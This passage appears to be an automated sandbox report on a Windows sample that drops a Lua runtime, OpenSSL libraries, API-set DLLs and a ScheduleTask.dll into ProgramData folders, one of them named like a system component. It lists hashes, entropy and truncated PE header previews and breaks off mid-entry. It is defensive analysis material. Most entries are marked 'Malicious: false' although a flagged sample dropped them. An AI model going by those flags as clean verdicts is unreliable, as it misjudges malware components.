SHA-512:	41469C50A74F4F05528689CB5D58AB0E5463AE4D5DB8E3334E6F2FA013860E399E48CE8389E0C99D002274E88252CBF5EBA6686C9AD82422ACDA73B271032908
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d...C............." .........................................................0.......)....`.........................................`................ ..................8!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\api-ms-win-core-processthreads-l1-1-1.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12304
Entropy (8bit):	6.679907167945202
Encrypted:	false
SSDEEP:	192:VtODfIeSHWphWA7D1S8f4DBQABJJSjhKEwkqnajVkL2s:VtODfIeSHWphWaD1IDBRJJshKtklxts
MD5:	1DD85830BD6F8EB28AA32E23A02514C9
SHA1:	3AA0AA5BDD4B4F5EFDE15D59FE5AD8C54F8B1D26
SHA-256:	E2E2E55C67C0CAF51B06B1FB308ACCFBC14155DECB1CCA98AF5500FB7FBA6296
SHA-512:	1AD7D99F039434F94CA675ED6A9EA6B0D4C9E957190F38E778DF349BBCEE28CABAB618C1E2D097AF00585DCDBDC846C44FFFC42730B182235128A6B01F2438BD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d...k............." .........................................................0......~.....`.........................................`................ ..................."..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\api-ms-win-core-synch-l1-2-0.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12088
Entropy (8bit):	6.710746156342401
Encrypted:	false
SSDEEP:	192:oXtZ39hcWphWmD1S8f4DBQABJtY1S4kOqnaj2NLOmkK:ytZ39hcWphWmD1IDBRJtClgilK
MD5:	B472CB62FD29F5686FF6C04B6CBBA074
SHA1:	56EC685C0A09F62075BB404F96B76D6ABC6E114B
SHA-256:	02C4E2DC2C922F17E1E174AF76253775EE0AB2F83C421FD769591CE010FB1AFD
SHA-512:	DA9F551268C87D756A9E4DD55BFB2EDDC04B9CCC584B348A13D45C82E2F00A4DA8A1BAA7182AE2EB8048B8D479634C8D184DB1599A45FF89250950B483334F99
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d...;.?A.........." .........................................................0......T.....`.........................................`...x............ ..................8!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\api-ms-win-core-timezone-l1-1-0.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12088
Entropy (8bit):	6.698884766840221
Encrypted:	false
SSDEEP:	192:GSWphWCD1S8f4DBQABJtEV3pPqs7IwdY+kqnajHaqxgmIh:GSWphWCD1IDBRJtETzIwS+klTx4
MD5:	83E18EE6246907BA1DE2715692C113C7
SHA1:	A18E09D763330ACF895ED276CC34597FF12A0319
SHA-256:	F2F3A2519F439A68E85E54DF2277B49758765C3FA80F10BE8186E95FAD0F481F
SHA-512:	27C374E1C39C837DD48BBB415556145B41406D6881D90EC4CF4876FCB7BD6E856759A0EB4FEAC2AFC8B008C449DE9A8FBCBD9A1136ED4A20180693C89E63E365
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d.....8..........." .........................................................0......s.....`.........................................`...P............ ..................8!..............T............................................................................rdata..t...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\api-ms-win-crt-conio-l1-1-0.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12600
Entropy (8bit):	6.626069586956527
Encrypted:	false
SSDEEP:	192:yEWphWbD1S8f4DBQABJtkzCKQRW52fqnaj7zd1T8i:yEWphWbD1IDBRJtiNifl/zd1v
MD5:	057BD0ABEF440891440A32C9FF22AE4E
SHA1:	4B73E7BE26B100BF2E81475A1F04433A6D912569
SHA-256:	B1D8CDE490382992D4C73A75C532999BD25FCF4DC484E99C4DF0DA3BB8EAB064
SHA-512:	87B524A001A7C57FF721549F0B03B1B5103685E2DA2DC10E3D4E0FEDC276FC2ACA0954C12B4504A97373D5292FC57563FFCF4046A70B8E0B4D6E3B071014B386
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d....(C~.........." .........................................................0.......F....`.........................................0................ ..................8!..............T............................................................................rdata.. ...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\api-ms-win-crt-convert-l1-1-0.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	15672
Entropy (8bit):	6.429073005612887
Encrypted:	false
SSDEEP:	192:w89M0wd8dc9cy1WphWWD1S8f4DBQABJt9o0Z5uE7Mqnajcno:wt0wd8xy1WphWWD1IDBRJtO0zuOMlAo
MD5:	C8DBF0CA88FACFE87899168A7F7DB52C
SHA1:	E2CF163AD067B5D3B19908A71ED393711F66CD09
SHA-256:	94B6E91B93C2202DABD659BFF294BEE87C22897A30A6B4930B49051C2FB502DC
SHA-512:	E85C738F5D5A0AE6C3EF75A082712CB3CF2FEAE4560D316CB110E4EAF3A97D6058D5374DA2A5EDDE39C3114F9AFF8A027CBDFF8CF49BE2425943BAC09C39E70B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d...b.&..........." .........................................................@............`.........................................0................0..................8!..............T............................................................................rdata..............................@..@.rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\api-ms-win-crt-environment-l1-1-0.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12088
Entropy (8bit):	6.592274834533459
Encrypted:	false
SSDEEP:	192:yKNcWphWCD1S8f4DBQABJtG3pPqs7IwdY+kqnajHaqxgm2:yKNcWphWCD1IDBRJt8zIwS+klTxC
MD5:	9653409A06CF90AEAE4491EE6A66125C
SHA1:	CE0565B4212FA2D9824AB52C151BC13836B981F6
SHA-256:	5833BF2D9A301ED80514E6133B0DFF7C9BA152B4631FA6BC0153FDD696C0757F
SHA-512:	F09AFAEF6E848C133294A5E75FD8E5FDE27B57D429FB504D2F97B42ABBBA4E0BD878BA84B89152558C3C721F2184A114FAADA7B77892222180450E99AB9DE828
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d...X.&..........." .........................................................0......X.....`.........................................0..."............ ..................8!..............T............................................................................rdata..R...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\api-ms-win-crt-filesystem-l1-1-0.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	13840
Entropy (8bit):	6.66153979380542
Encrypted:	false
SSDEEP:	192:zt/PGnWlC0i5C9WphWAeD1S8f4DBQABJJ2yy2D8KN3qnajV2MVorr:VunWm5C9WphWbD1IDBRJJkt2lxnorr
MD5:	42A2A95F1BB940D01F55EB1674A81FE2
SHA1:	F982F3BBB4DC3AAABA8DF098D1B395846F7CBA08
SHA-256:	51541EC6684B43157A85EA46A42EBED4555BE06BED0D0D07FF3EA6377301318D
SHA-512:	DE9A7A1A6A45E2F76105EAEAFCC3C29ADBFF142DCF2586E147417045B897A9DCDDEC5E1B97ACFC5D3FC9C8E3A508DBC3F607BF3DF20A7435E74436F94CB056B6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d...M%I..........." .........................................................0............`.........................................0................ ..................."..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\api-ms-win-crt-heap-l1-1-0.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12600
Entropy (8bit):	6.564902228429042
Encrypted:	false
SSDEEP:	192:DaY17aFBRQWphWp+QD1S8f4DBQABJtAa46ArNc4qnajr7PQW:7VWphWFD1IDBRJtAa54lrPQW
MD5:	98DA186FD7D7873C164A51C5D7B77F1A
SHA1:	725A8B8FDFBE6A1E85674F4B2A7C0DD08411E00B
SHA-256:	80139E4CAA379D87B1D1DAFC23ACE71D2B330368115F6314140D4AE59C2A78E8
SHA-512:	587B49A24CC59D4DCB62B59F379D1C9010196A6551CFC99FFDD931EEB0172618F020863191E530D65AD198E57063C57BA6F70BCF80591304243268EA5513F806
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d...+..<.........." .........................................................0............`.........................................0................ ..................8!..............T............................................................................rdata..F...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\api-ms-win-crt-locale-l1-1-0.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12088
Entropy (8bit):	6.688860624820208
Encrypted:	false
SSDEEP:	192:JWphWzDD1S8f4DBQABJtySO5M8xOSqnaj3yAY9:JWphWHD1IDBRJtyICTluAY9
MD5:	FF48B107B2449A647C64BAABD49408A1
SHA1:	EFB868BA125D9FF08474F02B9483D74C36A13CEE
SHA-256:	7BB8644E565AD4BCFD890F9044BCCB4D99953A740E9A500B1F820B2FDC3FC240
SHA-512:	4DA2E4B727E7F31F8BFFD680453C451B444BDF217C15CB36E353F8BB5ECB6C6481CAA7D848558C7D94CFC2D1BC3551ACE11E85FFC8EC7A7B570A59C294EA0216
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d....u.).........." .........................................................0............`.........................................0...e............ ..................8!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\api-ms-win-crt-math-l1-1-0.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	21008
Entropy (8bit):	6.216296697633644
Encrypted:	false
SSDEEP:	384:rJI2M4Oe59Ckb1hgmLZWphW1D1IDBRJJo95DKlxT1xpN:ri2Mq59Bb1jEkI1PU5Dmv
MD5:	E10E077BB06209AEDD0D0D378C758F73
SHA1:	97A9053A311280678F8EF65DC4E25975C41BD4EE
SHA-256:	8A7BFF1C918539A75C25568DB25933D653C003E016FD7791A37186B42BBB7C20
SHA-512:	571C1FC4192320BD967B603E6CDA917A62F4720EB4DCD557EC2913D2558C0CFE68F936198F5809934AAA3A1D6049E8E918EB0E638A7244DF5C71EF0C78843191
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d................." .........,...............................................P......+.....`.........................................0....%...........@...............0..."..............T............................................................................rdata...&.......(..................@..@.rsrc........@.......,..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\api-ms-win-crt-multibyte-l1-1-0.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	19768
Entropy (8bit):	6.187858108767444
Encrypted:	false
SSDEEP:	384:6USrxLPmIHJI6/CpG3t2G3t4odXLZWphWwD1IDBRJtfNYLIKlzbT:biPmIHJI6inI1PALJ
MD5:	964CA669AC5B78969F5878BD3DAE4C6E
SHA1:	E6AFCF9E393900FBB16E1F0FC217135CE2BCAE31
SHA-256:	D1B720EE0C34F72467ACA491922B75E1BF08A71236926D96F65588A164659547
SHA-512:	6D8D692B956E1070B76A0A82B9FF67E2023454AD25A2D83E4A0EAF7033DAE5F55A7D99EB6074056686981ED0956642DCFA47EC09B2DA63518CEDFDFAB7B131F5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d....m............" .........(...............................................P............`.........................................0.... ...........@...............,..8!..............T............................................................................rdata..$".......$..................@..@.rsrc........@.......(..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\api-ms-win-crt-private-l1-1-0.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	64528
Entropy (8bit):	5.541377195160328
Encrypted:	false
SSDEEP:	1536:JTs8iYDe5c4bFe2JyhcvxXWpD7d3334BkZn+P9HPxc:/iYDe5c4bFe2JyhcvxXWpD7d3334BkZa
MD5:	BB6F4337173099F38FD45BEA90A5FB9A
SHA1:	B661D0BA0AA6974599FD15A2DDBC4084A02282BD
SHA-256:	77992FB879A7E0977858BAE7DD87B73F7D4219F926C9B4C595E1A957A53ACAB7
SHA-512:	BF22265CE158D3FE33DA546A5254711B5F453A9102354EF83387568E3E1AC02841FB246D99B3552CD2824E2674E953547D3A3A3C850FC461DB38BC52DC2F6A91
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d................." ......................................................................`.........................................0...................................."..............T............................................................................rdata..............................@..@.rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\api-ms-win-crt-process-l1-1-0.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12816
Entropy (8bit):	6.602161953098382
Encrypted:	false
SSDEEP:	192:8nqjd71WphWAAD1S8f4DBQABJJn81M2XSoaqnajVMSLadj4:8n8WphWxD1IDBRJJ0Zalxb
MD5:	DABC28A5632A21E7F09ACCB9D69D10D7
SHA1:	254DA0966025E432B94A95B4700AF76AED0DEA73
SHA-256:	E53E39324294F677E238EEC0C084440C3F23DA171E6CB1E615A30504BF408A95
SHA-512:	6B5915EFD7BDE198DECA1F6B9A68E483DE2AC9D493A6999D5C7C2662C9B5B380F47D270D0FB98AFCCFC542CF78EAFF1988C56EEF33CD5A3F0A224256C94C33C1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d....k............" .........................................................0......q.....`.........................................0...x............ ..................."..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\api-ms-win-crt-runtime-l1-1-0.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	16400
Entropy (8bit):	6.457853206819431
Encrypted:	false
SSDEEP:	192:uaajPrpJhhf4AN5/KipWphWAzD1S8f4DBQABJJLQ67T0q11qnajVtPx5g:ulbr7fWphWiD1IDBRJJL7Tplxb5g
MD5:	F91E1FF896B5616919AC97C7095C513E
SHA1:	4EC6EED0BAC5A8801DB10238C7B3A5D35A87BE67
SHA-256:	07382C0D91DAD2BB6BA8BD06EA02F12C57ABF7C4E5A70672E9F2954D09A4FFD4
SHA-512:	6448D6CDFDE11E1805B6D381111EA062F681807C9DC54AE890305F287B13B6FB57EF3F4D3B909E56B81C99830C086B5702B46BA0F93E695FCE2B87B32FA4B26A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d...J.E..........." .........................................................@.......j....`.........................................0...4............0..................."..............T............................................................................rdata..d...........................@..@.rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\api-ms-win-crt-stdio-l1-1-0.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	17960
Entropy (8bit):	6.408816797873159
Encrypted:	false
SSDEEP:	192:BpPLNPjFuWYFxEpah7WphWRD1S8f4DBQABJ+SiLuEbNEdiqnajVCpEbOg4:B19OFVh7WphWRD1IDBRJ5iLbnlxkEf
MD5:	429C26ED27A026442F89C95FF16CE8C2
SHA1:	69ED09FAAE00A980C296546C9B5E6A8D5F978439
SHA-256:	2A466648AFFD3D51B944F563BB65046A3DA91006A0D90FB2C0B123487A1FC1B3
SHA-512:	04641164D9E1EB3183DB0C406583626011DFE2B2574551C0AC466EBF44165AFCD7D8FAF356B8268B4FC9A54DB20DE010A4E4293594AD2E605950AEA65636F4E5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d...&8............" ......... ...............................................@......8R....`.........................................0...a............0...............$..("..............T............................................................................rdata..............................@..@.rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\api-ms-win-crt-string-l1-1-0.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	18472
Entropy (8bit):	6.2908411765250145
Encrypted:	false
SSDEEP:	384:fFvU4x0C5yguNvZ5VQgx3SbwA7yMVIkFGl3WphW+D1IDBRJ5YBMOnlxkEx:p5yguNvZ5VQgx3SbwA71IkFxVI1PKJ
MD5:	0F593E50BE4715AA8E1F6EB39434EDD5
SHA1:	1117709F577278717C34365CE879BCD7C956069B
SHA-256:	BF4EA10BE1B64C442AC0CCF4BDF69F6703467176A27E9E14A488D26448A6E179
SHA-512:	487DCBF7B7F18D62606CB2F05C8FEFF07E6ECDA42E643F5919C6EDDA66CDB3B8CC393B0D260374F06C10CF54082410FC9F02BD87CC50866BC0C28B0BCEC3E658
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d...W.>4.........." ........."...............................................@............`.........................................0................0...............&..("..............T............................................................................rdata..............................@..@.rsrc........0......."..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\api-ms-win-crt-time-l1-1-0.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	14136
Entropy (8bit):	6.542984945153259
Encrypted:	false
SSDEEP:	192:Uy5NDSWphWND1S8f4DBQABJFcqpVwyqnajlAph2xP:UUEWphWND1IDBRJFLvlmph2xP
MD5:	56B870CCDBD25A5DBC2CFC072BA13BD7
SHA1:	CB9F6ACDCB7DD5A8F9D02A1280793440F66BFEF3
SHA-256:	AC4E636F8E32A5D0FC274B56385ABFBC301B2EECD7FD76E28F3D367543E6E65F
SHA-512:	135D652BD4F5D74451B6F4ED39FBB2DF6F9ED2D16E2144C80A40B496D4131A4E5CA5A7615F69ABE90122B69E9B43D5238DA68DF7C750E31F021AC6FFB0990D37
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d....y.?.........." .........................................................0............`.........................................0................ ..................8!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\api-ms-win-crt-utility-l1-1-0.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12296
Entropy (8bit):	6.693058520363979
Encrypted:	false
SSDEEP:	192:ZI6fHQduHWphWBmD1S8f4DBQABJRx1usUDR0qnajVXj9hcod:TfxWphWoD1IDBRJRx1uQlxzbL
MD5:	F3F683484B97D2365B0B77B5EBBEEFED
SHA1:	3420E5946C5415131B919A2951AD183212D2D89A
SHA-256:	023E5185CFF7CD2B8ADD590D4BC0E3240D24895C59CA8B0495E79608FD0BE88A
SHA-512:	3AA94EDDBD74041652202FB4CC21923A96829FF13C6B1C118FA7BBAD2CAC2AAB85E6E6323E72E419C07422A652E81A461BCD9475F98A616ADE1F76DD6B8F313B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d................." .........................................................0......@.....`.........................................0...^............ ..................."..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\libcrypto-1_1-x64.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2480296
Entropy (8bit):	5.887920723713364
Encrypted:	false
SSDEEP:	49152:avYUOh5Px04+pRXhFXv1uTrZ0adtqXfDGszqFzPm0PfQ1CPwDv3uFgskh:rr+v7XtEseS0PI1CPwDv3uFgsc
MD5:	8C75BCA5EA3BEA4D63F52369E3694D01
SHA1:	A0C0FD3D9E5688D75386094979171DBDE2CE583A
SHA-256:	8513E629CD85A984E4A30DFE4B3B7502AB87C8BC920825C11035718CB0211EA0
SHA-512:	6D80D26D91B704D50FF3AD74F76D6B1AFE98AF3D7A18E43011DBE3809ADC305B0E382C10868328EB82C9F8B4C77BCA1522BDC023C7C8712057B65F6579C9DFF5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B...#...#...#...[...#...K...#...K...#...K...#...K...#...E...#...#..j#...K...#...K...!...K...#...Kg..#...K...#..Rich.#..................PE..d......\.........." .....R...........g.......................................`&.......&...`......................................... . ..7...%.,.....%.......$..a....%.......%..C.....8.............................................%..............................text....Q.......R.................. ..`.rdata.......p.......V..............@..@.data...!.....#.......".............@....pdata..$.....$.......#.............@..@.idata...#....%..$....%.............@..@.00cfg........%......R%.............@..@.rsrc.........%......T%.............@..@.reloc...a....%..b...\%.............@..B........................................................................................................................................................

C:\ProgramData\ShellExperienceHost\libssl-1_1-x64.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	523944
Entropy (8bit):	5.500138412850847
Encrypted:	false
SSDEEP:	12288:Wkgq6N7Z8nTtk2XXMEeDke/M9qAmZ/fTab4SeUYSvzaXSS3aEc89Yeyhy8Z8kmDD:W64ZBN9O+PS0npgcmrc
MD5:	0205C08024BF4BB892B9F31D751531A0
SHA1:	60875676BC6F2494F052769AA7D644EF4A28C5E5
SHA-256:	EBE7FFC7EB0B79E29BFC4E408EA27E9B633584DD7BC8E0B5FFC46AF19263844B
SHA-512:	45DA0C128BFB706CB0340AD40FBC691696F3483A0235FAAAC864DEA4580B57E36AA5B4B55A60322081D2D2E2DF788C550FD43C317582A9B6A2D66712DF215BD0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......BxqD.............a......Tq......c.......Tq......Tq......Tq......jq..............jq..!...jq......jq......jq......Rich............................PE..d......\.........." .....f........... .......................................P............`.............................................=........... .......`..(;...........0..l....A..8............................A...............................................text....d.......f.................. ..`.rdata...h.......j...j..............@..@.data...9b.......Z..................@....pdata..<B...`...D..................@..@.idata...R.......T...r..............@..@.00cfg..............................@..@.rsrc........ ......................@..@.reloc..3....0......................@..B................................................................................................................................................

C:\ProgramData\lua\ScheduleTask.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	136704
Entropy (8bit):	6.472955772089723
Encrypted:	false
SSDEEP:	3072:nXIDYPo8FvtRHHrZHln1E03UFeBBpj6U+E9sY7z11dyxuI2ICGbJeHG:XIDYbF9NH51E0V3x6U5sYOzbq
MD5:	565E85C506595D312521995D631C2650
SHA1:	D992E310EFF25BBC257F71094261700D3C824F18
SHA-256:	F10D5B3B93922465E06A56D250BD8C3945E6E71469F49F63D669469D76B599ED
SHA-512:	13B28436B2BD0A32A5E9E6DD2C2B0FACE616C750FB738DF5766880BFF43B87974EC40B02F5C64EFBF0FACC42A29743BFBF2CAD815B7CFFD86B21039BDE1D5BFC
Malicious:	false
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........2...S...S...S...8...S...8...S...8...S...8...S...&...S...&...S...&...S...8...S.......S...S...S...&...S...&...S...&...S...&...S..Rich.S..........................PE..L....K.`...........!.....t...........7.......................................`............@.............................X............0.......................@..D...H...p...............................@...............\|............................text...ls.......t.................. ..`.rdata...z.......\|...x..............@..@.data...............................@....rsrc........0......................@..@.reloc..D....@......................@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\lua\alien\core.dll Download File
Process:	C:\Users\user\Desktop\WhQZ6UbCEY.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26112
Entropy (8bit):	6.041879113053515
Encrypted:	false
SSDEEP:	384:AVoM6fWeey/2C5OjSxHve5O/AOeHS/OHWfsPYbRXSMinbbQdrl1gCTRKEznQTAt6:VKeeyhkmlm5KVial1gCTrnQAJHIz
MD5:	24B6950AFD8663A46246044E6B09ADD8
SHA1:	6444DAB57D93CE987C22DA66B3706D5D7FC226DA
SHA-256:	9AA3CA96A84EB5606694ADB58776C9E926020EF184828B6F7E6F9B50498F7071
SHA-512:	E1967E7E8C3D64B61451254DA281415EDF9946A6C8A46006F39AE091609C65666C376934B1BDCBD2A7F73ADEA7AA68E557694F804BF3BC3CE7854FA527E91740
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S...2..2..2..P=..2.....2.....2.....2..2...2.....2.....2.....2..Rich.2..........PE..L......J...........!.....@...".......I.......P.......................................................................c..N....[..P....................................................................[..@............P..l............................text....?.......@.................. ..`.rdata.......P.......D..............@..@.data...\....p.......Z..............@....rsrc................\..............@..@.reloc...............^..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\lua\effil.dll Download File
Process:	C:\Users\user\Desktop\WhQZ6UbCEY.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	576000
Entropy (8bit):	6.601925533921573
Encrypted:	false
SSDEEP:	12288:xV1K6PVDcC6qzBHHK3byzqEuEmq1FiZgyrHstZ70uyZrGffGAOacxla:xV1K6JUrHsnL9fj
MD5:	7BDEAE70550388EDD83BCF7D8C53EDA0
SHA1:	36322EFB7B515AB4835801D9786C8330535F2F00
SHA-256:	6C4F740E386D663EE233D1288C12717DE3565A612DAFCC60054230C6789C1B8A
SHA-512:	F22489708730BE1BBC179FE2B20E77F4EB2A794B8A203CC28860D965295F280FFA8BC8081E7523B51488D142A513D801C2C8AB7A71493D92AC884C65698999E8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................N...................................9..........A.....................Rich....................PE..L......`...........!.........*......_m....................................... ............@..........................,..L...,-..<................................b......................................@...............h............................text...F........................... ..`.rdata..............................@..@.data...l\...@...8...,..............@....rsrc................d..............@..@.reloc...b.......d...f..............@..B................................................................................................................................................................................................................................................................................................

C:\ProgramData\lua\lua.exe Download File
Process:	C:\Users\user\Desktop\WhQZ6UbCEY.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	2.6809046423291965
Encrypted:	false
SSDEEP:	96:+jurVfJLj9rM3RVrRBRGQuMPUdt6RUSffRnkqR7kRP4oynXzN37SXny:+6rqhV13GFnSHtko7yP4oynDN37Si
MD5:	847B0D65C80A8E777E8AA108295C0B95
SHA1:	A6DCB951B65A5C97ECA8BB65A3EDA638981AF4B9
SHA-256:	A379A56E5046C8F1991BE0E78B1C5491E45F96FD6EF7DD7F4301373D7375BCE1
SHA-512:	1AD381B6566E776083200CCC07C01298105B775B947F5CDD5665FCF765DE0ABA41BB74F55CBF000283562ADEBA026C7C4DF03A96EEC3942DE3D9E30DDB2BFCE5
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........qx...+...+...+f..+...+...+...+...+...+...+...+"..+...+...+...+Rich...+................PE..L...p..F.....................0......;........ ....@..........................P............................................... ..<....@............................................................................... ...............................text...\|........................... ..`.rdata....... ....... ..............@..@.data........0.......0..............@....rsrc........@.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\lua\lua5.1.dll Download File
Process:	C:\Users\user\Desktop\WhQZ6UbCEY.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	6.375707469907049
Encrypted:	false
SSDEEP:	1536:5PXOqJ75sqpmtyAmYrAg4UbsX3ahajE2+3Q2efjT4Nk5cFcI:5GqJ7VEyAPAg4UwHEawH3Q2efYgcd
MD5:	DCF2333A8639BC0B9FC2295CB1B779FE
SHA1:	02BEF2211CADEC3ABF4075E6ACAA3FB37C63D166
SHA-256:	ACC74DEC46855B78D48813123029D49824AB6A087325EF223865272655A630BA
